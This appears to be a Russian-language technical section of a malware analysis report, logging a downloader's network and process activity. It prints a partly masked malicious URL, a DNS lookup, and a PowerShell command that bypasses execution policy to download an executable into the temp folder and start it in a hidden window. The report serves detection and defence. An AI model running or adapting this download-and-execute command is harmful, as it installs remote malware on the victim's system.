Техническая информация
- http://ju##.##me-creation.ch/log-performance/v3/pvdi.php как %temp%\bbjjqwe3.exe
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://ju##.##me-creation.ch/log-performance/v3/pvdi.php','%TEMP%\bBJjqwe3.exE');Start ...
- DNS ASK ju##.##me-creation.ch
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('http://ju##.##me-creation.ch/log-performance/v3/pvdi.php','%TEMP%\bBJjqwe3.exE');Start ...' (со скрытым окном)